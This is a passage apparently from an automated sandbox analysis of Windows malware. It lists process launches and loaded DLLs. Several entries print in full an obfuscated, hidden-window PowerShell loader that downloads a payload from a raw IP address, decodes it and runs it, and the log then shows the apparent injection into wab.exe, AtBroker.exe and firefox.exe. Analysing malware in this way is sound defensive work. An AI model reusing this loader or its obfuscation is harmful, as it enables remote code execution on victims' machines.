';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Huisher = 1;$Sstersnner225='Substrin';$Sstersnner225+='g';Function Orthographising($N){$Tarantass=$N.Length-$Huisher;For($Glamouriserende=1; $Glamouriserende -lt $Tarantass; $Glamouriserende+=(2)){$Sprogrgter+=$N.$Sstersnner225.Invoke($Glamouriserende, $Huisher);}$Sprogrgter;}function Kneblende($Arveprinsen){.($Sammenkrbet) ($Arveprinsen);}$Drkarm=Orthographising 'KM oSzKi.l l aN/ 5T.S0S (RWNi n,dBoEwFsL N.T. A1E0 .S0N; .WDiUnP6g4T; Sx 6 4u; TrSvK: 1 2 1 . 0C) FG,eTc k,oE/,2,0 1Y0O0J1T0m1. CFUi rRe fSo.xB/,1,2K1F.S0 ';$Nonexultation74=Orthographising ',UlsFe,rT-BADgTe n.t. ';$Rekrutteredes=Orthographising 'sh.t tApC:S/./t8K7T. 1.2K1.. 1 0.5..,1C6.3,/.S kSaAb s,. a sCdS ';$Forprvens=Orthographising '.>. ';$Sammenkrbet=Orthographising 'Bi.eRxU ';$Greasing = Orthographising ' e c,h oH % a p p,dfa,t a %.\ SSpAeBcOiRf,i,c.eSrUicn ghsm.pLIiRtR ,&B&B e,cHhPo, J$, ';Kneblende (Orthographising 'D$PgLlsoRb aClS: P r oFn o,m iGa,lS9 9V=u(YcRmBd M/pcF E$CG rSe,aAsSiSnFg )S ');Kneblende (Orthographising 'L$EgLlTo,bWaSl,: URnSr eAsIiUlTiBeSnCtR= $.R e kCr uFtWt,e rJe d e sC.AsTp,l i tS(S$.F,o rWp.r,v e.nUsA)S ');$Rekrutteredes=$Unresilient[0];Kneblende (Orthographising 'D$ gGlKo b,a lS:EE nTcRhFeIq uFeGrF=kNLeFw,-BO b.j e,c t STySsBtPe m .CN,e t,..W eAb,C.laiFeSn t ');Kneblende (Orthographising ' $.E,nAcThDeLqFuTeCr.. HKeIa dBe r.s [ $SN o.n e x u l,tUa tTiTo.n 7 4P] =,$.DarFk.a r,mT ');$Triptych=Orthographising 'VE nOc hPeKq ube r,.,D obw nAlNoTa.d F.i l e,(V$AR e kKrLu tKtie.rVe dCeAs.,h$ a cRl yidSe.sS)U ';$Triptych=$Pronomial99[1]+$Triptych;$aclydes=$Pronomial99[0];Kneblende (Orthographising ' $ogOlBoVb a l : I.n tSrSo.dFuBc ePr =,(LTOeSsTt -,PUa t hM $Ra cUl.yWdJeSs ) ');while (!$Introducer) {Kneblende (Orthographising ',$Kg lIovbSaulL:ES p e kMt r.o s kDo pL= $,tMr u.e. ') ;Kneblende $Triptych;Kneblende (Orthographising 'FS.tSa.r t -BS l e eUpo A4 ');Kneblende (Orthographising ' $,g lHoMb a lC:cIKn t r o.dBu,cbeUr = (HTSe s,tG-UP.a t.h .$.aCcSl ygdHessL)F ') ;Kneblende (Orthographising '.$.gFlPo bTaMl :TB,e tPr,oAt h eTd s,=S$Mg.l oLbEaSl.:DB e,t tVe dI+.+,%B$ UVnGr.eEs.iAl i e.n,tS. c oEuBn t ') ;$Rekrutteredes=$Unresilient[$Betrotheds];}Kneblende (Orthographising 'F$DgKl o bia l :tD o,wInTrHu sGh iCn,gU = DG e t -,CSoDn t e n t H$.a.cSlLyGdSeRs ');Kneblende (Orthographising ' $ g.lTo b,awl :FPSr iTm eRrSs F=, [AS,ySsCt,e mH. COo n vQePr.t ]g:p:SF.rDo muB aTs,eS6.4 SSt,r i.nUgG(.$ DSo w nUrMu s h iDnEgR), ');Kneblende (Orthographising 'S$ gSlVoTbMaTl :,KVv iPsUt s P=W [MS.yAs t.e,mT.NTCe.xSt,..E n.cMoSd i.nig,] : :DAGSSC.IhIU. GTett SLtEr iVn.g,(,$TP.r,iCmReMr s,) ');Kneblende (Orthographising ',$Og lCoRb a,lT:,T e gSn.eKp r.o cSe.dPu rpeMrFnDe s,=.$ KOvHi s t s .As u.bKs.tBrKi,n.g,(.3 0L6.9S4C4., 2T6u1S9G0 ) ');Kneblende $Tegneprocedurernes;"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Specificerings.Lit && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"	Jump to behavior
Source: C:\Program Files (x86)\NjmXpJvhoGRzEuzXfHmNCFuseinvSYdqgQrBzxLOsPuWkF\bCnsXNQTRSfzsIGRzRYjWcXCwbsvh.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
